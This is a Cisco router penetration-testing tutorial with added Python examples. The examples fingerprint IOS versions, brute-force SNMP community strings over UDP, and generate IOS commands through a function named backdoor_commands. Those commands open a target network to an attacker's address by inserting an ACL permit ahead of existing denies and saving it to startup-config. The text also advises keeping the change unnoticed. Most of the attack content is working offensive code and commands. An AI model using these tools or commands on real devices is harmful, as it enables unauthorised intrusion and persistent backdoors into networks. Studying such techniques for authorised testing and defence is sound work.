- Introduction to CISCO penetration testing
- Scan & Fingerprint
The purpose of 'Scan & Fingerprint' is to identify open ports on the target
device and attempt to determine the exact IOS version. This then sets the plan
for further attacks. The services that matter on a Cisco device are Telnet
(23/tcp), SSH (22/tcp), HTTP/HTTPS (80 and 443/tcp) and SNMP (161/udp); a
TCP-only port scan will miss SNMP, so scan UDP as well.
If Telnet (or SSH) is active, then password guessing attacks should be
performed.
If SNMP is active, then community string guessing should be performed. With
nothing more than a read-only community string, the SNMP sysDescr object
(1.3.6.1.2.1.1.1.0) returns the same version string as the first lines of
'show version', which is the most reliable way to get the exact IOS release.
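The fingerprinting step ends with a version string, and every later step (the
vulnerability assessment in particular) needs it broken into comparable parts.
The following is an added example, not code from the original page: it parses
the text returned by 'show version' or by the SNMP sysDescr object into a
structure that can be ordered against an advisory's "fixed in" release. The
three sample strings are constructed in the shape of IOS output, not captured
from a real device; the regular expressions and field names are this example's
own assumptions about that layout.

```python
"""Fingerprint a Cisco IOS version string (added example, not from the page)."""
import re
from typing import NamedTuple, Optional

# Constructed sample strings in the shape of IOS output; not from a real device.
SAMPLE_NEW = (
    "Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), "
    "Version 12.2(55)SE5, RELEASE SOFTWARE (fc1)\r\n"
    "Technical Support: http://www.cisco.com/techsupport"
)
SAMPLE_OLD = (
    "Cisco Internetwork Operating System Software \r\n"
    "IOS (tm) C2600 Software (C2600-I-M), Version 12.1(5)T9,  "
    "RELEASE SOFTWARE (fc1)"
)
SAMPLE_XE = (
    "Cisco IOS Software [Everest], ISR Software "
    "(X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 16.6.4, RELEASE SOFTWARE (fc3)"
)

# "Version 12.2(55a)SE5": major.minor(maintenance[interim letter])train[rebuild]
_VERSION_RE = re.compile(r"Version\s+(\d+)\.(\d+)\((\d+)([a-z]?)\)([A-Z]*)(\d*)")
# IOS XE style "Version 16.6.4"
_XE_VERSION_RE = re.compile(r"Version\s+(\d+)\.(\d+)\.(\d+)")
# Image names end in "-M", e.g. "(C2960-LANBASEK9-M)"
_IMAGE_RE = re.compile(r"\(([A-Z0-9_]+-[A-Z0-9_-]+-M)\)")
# The word before "Software (" is the platform, in both old and new layouts
_PLATFORM_RE = re.compile(r"(\S+)\s+Software\s+\(")


class IosFingerprint(NamedTuple):
    platform: str
    image: str
    major: int
    minor: int
    maintenance: int
    interim: str        # the "a" in 12.2(55a), "" otherwise
    train: str          # "SE", "T", ...; "" for mainline and IOS XE
    train_rev: int      # the 5 in 12.2(55)SE5, 0 if absent

    @property
    def crypto_image(self) -> bool:
        """'K9' in the image name marks a crypto build: SSH/HTTPS may be present."""
        return "K9" in self.image

    def key(self):
        """Ordering key for comparing releases that sit on the same train."""
        return (self.major, self.minor, self.maintenance, self.train_rev)


def fingerprint(banner: str) -> Optional[IosFingerprint]:
    """Return the parsed version, or None if the text is not an IOS banner."""
    m = _VERSION_RE.search(banner)
    if m:
        major, minor, maint, interim, train, rev = m.groups()
    else:
        m = _XE_VERSION_RE.search(banner)
        if not m:
            return None
        major, minor, maint = m.groups()
        interim, train, rev = "", "", ""
    image = _IMAGE_RE.search(banner)
    platform = _PLATFORM_RE.search(banner)
    return IosFingerprint(
        platform=platform.group(1) if platform else "",
        image=image.group(1) if image else "",
        major=int(major),
        minor=int(minor),
        maintenance=int(maint),
        interim=interim,
        train=train,
        train_rev=int(rev) if rev else 0,
    )


if __name__ == "__main__":
    for sample in (SAMPLE_NEW, SAMPLE_OLD, SAMPLE_XE):
        print(fingerprint(sample))
```

The key() tuple is only meaningful between releases on the same train (12.2SE
against 12.2SE); Cisco advisories list fixed releases per train, so compare
train first and key() second.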
- Credentials Guessing
If a network engineer/administrator has configured just one Cisco device with a
poor password, then the whole network is open to attack. Attempting to connect
with various usernames/passwords is a mandatory step in testing the level of
security that the device offers.
Attempt to guess Telnet, HTTP and SSH account credentials. A device whose vty
lines are configured with 'login' rather than 'login local' asks for a line
password only, with no username prompt, so the guessing tool must cope with
both forms. The IOS HTTP server authenticates with the 'enable' password by
default, so a password guessed over HTTP is usually the 'enable' password
itself.
Once you have non-privileged access, attempt to discover the 'enable' password.
Also attempt to guess Simple Network Management Protocol (SNMP) community
strings. A read-only string already reveals the IOS version, interfaces and
routing table; a read-write string can be used to make the router copy its
configuration file to a TFTP server you control, and the config contains the
'enable' password. If it is set with 'enable password' the value is stored
reversibly (type 7) and decodes instantly; 'enable secret' (type 5) stores a
salted MD5 hash that must be cracked.
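The SNMP guessing step described above, as an added example that is not code
from the original page. It hand-encodes an SNMPv1 GetRequest for sysDescr.0,
sends one per candidate community string and treats a GetResponse carrying our
request-id as proof that the string is accepted. SNMPv1 agents silently drop
requests with an unknown community, so a timeout is the normal "wrong guess"
result, and a response with an error status still proves the string. The BER
helpers, the wordlist and the 192.0.2.1 target in the usage are this example's
own; the response packet used in testing is constructed, not captured.

```python
"""SNMPv1 community string guessing (added example, not from the page)."""
import socket
from typing import Dict, Iterable, Optional, Tuple

SYSDESCR_OID = (1, 3, 6, 1, 2, 1, 1, 1, 0)
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2    # SNMPv1 PDU tags (context class)


def _ber_len(n: int) -> bytes:
    """BER length: short form below 128, long form (0x8N + N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(value)) + value


def _int(value: int) -> bytes:
    """INTEGER with the minimal two's-complement body BER requires."""
    body = value.to_bytes(value.bit_length() // 8 + 1, "big", signed=True)
    return _tlv(0x02, body)


def _oid(arcs: Tuple[int, ...]) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    first, second, *rest = arcs
    out = bytearray([first * 40 + second])
    for arc in rest:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return _tlv(0x06, bytes(out))


def build_get_request(community: str, request_id: int,
                      oid: Tuple[int, ...] = SYSDESCR_OID) -> bytes:
    """Message ::= SEQUENCE { version 0, community, GetRequest-PDU }."""
    varbind = _tlv(0x30, _oid(oid) + _tlv(0x05, b""))              # { oid, NULL }
    pdu = _tlv(GET_REQUEST, _int(request_id) + _int(0) + _int(0)
               + _tlv(0x30, varbind))                               # id, err, idx, list
    return _tlv(0x30, _int(0) + _tlv(0x04, community.encode()) + pdu)


def _read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_get_response(msg: bytes) -> Optional[Tuple[int, int, Optional[bytes]]]:
    """Return (request_id, error_status, value) from a v1 GetResponse, else None."""
    try:
        tag, body, _ = _read_tlv(msg, 0)
        if tag != 0x30:
            return None
        _, _version, p = _read_tlv(body, 0)
        _, _community, p = _read_tlv(body, p)
        tag, pdu, _ = _read_tlv(body, p)
        if tag != GET_RESPONSE:
            return None
        _, rid, p = _read_tlv(pdu, 0)
        _, err, p = _read_tlv(pdu, p)
        _, _idx, p = _read_tlv(pdu, p)
        _, vbl, _ = _read_tlv(pdu, p)
        _, vb, _ = _read_tlv(vbl, 0)
        _, _oid_bytes, p = _read_tlv(vb, 0)
        vtag, value, _ = _read_tlv(vb, p)
    except IndexError:
        return None                     # truncated or malformed packet
    return (int.from_bytes(rid, "big", signed=True),
            int.from_bytes(err, "big", signed=True),
            value if vtag == 0x04 else None)


def guess_communities(host: str, wordlist: Iterable[str], port: int = 161,
                      timeout: float = 1.0) -> Dict[str, Optional[bytes]]:
    """Return {community: sysDescr} for every string the agent answers."""
    found: Dict[str, Optional[bytes]] = {}
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        for rid, community in enumerate(wordlist, start=1):
            sock.sendto(build_get_request(community, rid), (host, port))
            try:
                data, _ = sock.recvfrom(4096)
            except socket.timeout:
                continue                # unknown community: the agent stays silent
            parsed = parse_get_response(data)
            if parsed and parsed[0] == rid:
                found[community] = parsed[2]   # an error reply still proves the string
    finally:
        sock.close()
    return found


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.1"      # placeholder
    candidates = ["public", "private", "cisco", "admin", "monitor"]  # constructed
    for name, descr in guess_communities(target, candidates).items():
        print(f"{name!r} accepted: {descr!r}")
```

The request-id check matters: a late reply to an earlier probe must not be
credited to the string sent after it. Keep the timeout short, and remember
that silence also results from a filtered port, so confirm 161/udp is reachable
(for example with the agent's own default string) before trusting a negative.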
- Connect
Once you have identified the access credentials, whether that be HTTP, Telnet or
SSH, then connect to the target device to identify further information: 'show
version', 'show ip interface brief', 'show ip route' and 'show cdp neighbors'
describe the device, its addresses and the networks and devices behind it.
If you have determined the 'enable' password, then full (privileged EXEC) access
has been achieved: 'show running-config' reveals the complete configuration,
including any other passwords, and you can alter the configuration of the
router.
- Vulnerability Assessment
To check for known bugs, vulnerabilities or security flaws in the device, a good
security scanner can be used, checked against the exact IOS version and image
obtained in the fingerprinting step. Nessus 3 is pretty good for this, although
there are many other alternatives, such as:
Retina
GFI LanGuard
Core Impact
There are also tools that
check for specific flaws, such as the HTTP Arbitrary Access
Bug:
ios-w3-vuln
- Further your attack
To further the attack into the target network, some changes need to be made to
the running-config of the target device.
There are two main categories for configuration files with Cisco routers -
running-config and startup-config.
running-config is the currently running configuration. It is loaded from the
startup-config on boot. Changes made in configuration mode take effect
immediately but live only in RAM, so they are lost once the router is reloaded.
It is this file that requires altering to maintain a non-permanent connection
through to the internal network.
startup-config is the boot-up configuration file, stored in NVRAM. It is this
file that needs altering to maintain a permanent connection through to the
internal network. It is not edited directly: once the running-config is as you
want it, 'copy running-config startup-config' (or the older 'write memory')
writes it out.
Once you have access to the configuration (enable, i.e. privileged mode, access
is required for this) you can add an access list entry to allow your IP address
into the internal network.
The following ACL entry will allow the defined <IP> access to any internal IP
address:
Router# configure terminal
Router(config)# access-list 100 permit ip host <IP> any
Router(config)# interface <outside interface>
Router(config-if)# ip access-group 100 in
Two caveats. An access list filters nothing until it is applied to an interface
with 'ip access-group', and an interface takes only one ACL per direction, so
if the outside interface already has an inbound ACL, add the permit to that
ACL rather than binding a new one (binding 100 would replace it and break the
existing filtering, which is noticeable). Also, 'access-list N ...' appends to
the end of the list and entries are evaluated top-down, so a permit added after
an existing 'deny ip any any' is never reached; on releases with ACL sequence
numbers, insert it in front with 'ip access-list extended N' and a low sequence
number such as '5 permit ip host <IP> any'.
So if the router is protecting a web server and an email server, this entry
will allow you to pass packets to those IP addresses on any port. Therefore you
should be able to port scan them efficiently.
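The running-config change described in this section, worked through as an
added example that is not code from the original page. It reads a
running-config, finds the ACL applied inbound on the outside interface, uses a
first-match simulation to show whether an appended 'permit ip host <IP> any'
would be shadowed by an earlier deny, and emits the command sequence, with the
step that makes it survive a reload when asked. The sample configuration is
constructed, 198.51.100.7 stands for the attacker's address, and the
'ip access-list extended <number>' form with a sequence number assumes an IOS
release that supports ACL sequence numbers (12.3 and later). Only 'any' and
'host' addresses and 'eq <port>' are modelled; wildcard-mask entries are not.

```python
"""Open the target network to one source through the outside ACL (added example)."""
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample running-config; not from a real device.
SAMPLE_RUNNING_CONFIG = """\
!
interface FastEthernet0/0
 description Outside
 ip address 203.0.113.2 255.255.255.252
 ip access-group 100 in
!
interface FastEthernet0/1
 description Inside
 ip address 192.168.1.1 255.255.255.0
!
access-list 100 permit tcp any host 192.168.1.10 eq www
access-list 100 permit tcp any host 192.168.1.20 eq smtp
access-list 100 deny ip any any log
!
"""

PORT_NAMES = {"www": 80, "smtp": 25, "telnet": 23, "domain": 53}   # names IOS prints


class Entry(NamedTuple):
    action: str            # permit | deny
    proto: str             # ip | tcp | udp | icmp
    src: str               # "any" or a host address
    dst: str
    dport: Optional[int]   # only 'eq <port>' is modelled


# Simplification: only 'any' / 'host A.B.C.D' endpoints and optional 'eq <port>'.
_ENTRY_RE = re.compile(
    r"^access-list (\d+) (permit|deny) (\S+) (any|host \S+) (any|host \S+)"
    r"(?: eq (\S+))?", re.M)


def parse_acl(config: str, number: int) -> List[Entry]:
    entries = []
    for m in _ENTRY_RE.finditer(config):
        num, action, proto, src, dst, port = m.groups()
        if int(num) != number:
            continue
        dport = None if port is None else (int(port) if port.isdigit() else PORT_NAMES[port])
        entries.append(Entry(action, proto, src.replace("host ", ""),
                             dst.replace("host ", ""), dport))
    return entries


def find_inbound_acl(config: str) -> Optional[Tuple[str, int]]:
    """(interface, ACL number) of the first 'ip access-group N in' binding."""
    iface = None
    for line in config.splitlines():
        if line.startswith("interface "):
            iface = line.split()[1]
        elif line.startswith("!"):
            iface = None
        elif iface and line.strip().startswith("ip access-group ") and line.endswith(" in"):
            return iface, int(line.split()[2])
    return None


def _addr_match(rule: str, addr: str) -> bool:
    return rule == "any" or rule == addr


def acl_permits(entries: List[Entry], proto: str, src: str, dst: str,
                dport: Optional[int] = None) -> bool:
    """First matching entry decides; every IOS ACL ends in an implicit deny."""
    for e in entries:
        if e.proto not in ("ip", proto):
            continue
        if not (_addr_match(e.src, src) and _addr_match(e.dst, dst)):
            continue
        if e.dport is not None and e.dport != dport:
            continue
        return e.action == "permit"
    return False


def backdoor_commands(config: str, attacker_ip: str, persist: bool = False) -> List[str]:
    """IOS commands that let attacker_ip through the outside interface's ACL."""
    binding = find_inbound_acl(config)
    if binding is None:
        return []      # nothing filters inbound traffic, so there is nothing to open
    _iface, number = binding
    entries = parse_acl(config, number)
    # 'access-list N ...' only appends. If any deny ahead of the new line can
    # match our source, the appended permit is dead and must go in front instead.
    shadowed = any(e.action == "deny" and _addr_match(e.src, attacker_ip) for e in entries)
    cmds = ["configure terminal"]
    if shadowed:
        cmds += [f"ip access-list extended {number}",
                 f"5 permit ip host {attacker_ip} any",   # ahead of default seq 10
                 "exit"]
    else:
        cmds.append(f"access-list {number} permit ip host {attacker_ip} any")
    cmds.append("end")
    if persist:
        cmds.append("write memory")    # = copy running-config startup-config, no prompt
    return cmds


if __name__ == "__main__":
    print("\n".join(backdoor_commands(SAMPLE_RUNNING_CONFIG, "198.51.100.7", persist=True)))
```

Run against the sample, the simulation shows why the naive append from the
text is not enough here: with the permit appended, a packet from 198.51.100.7
to 192.168.1.10 port 22 still hits 'deny ip any any' first, whereas the same
permit at sequence 5 lets it through.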
- CISCO Command Reference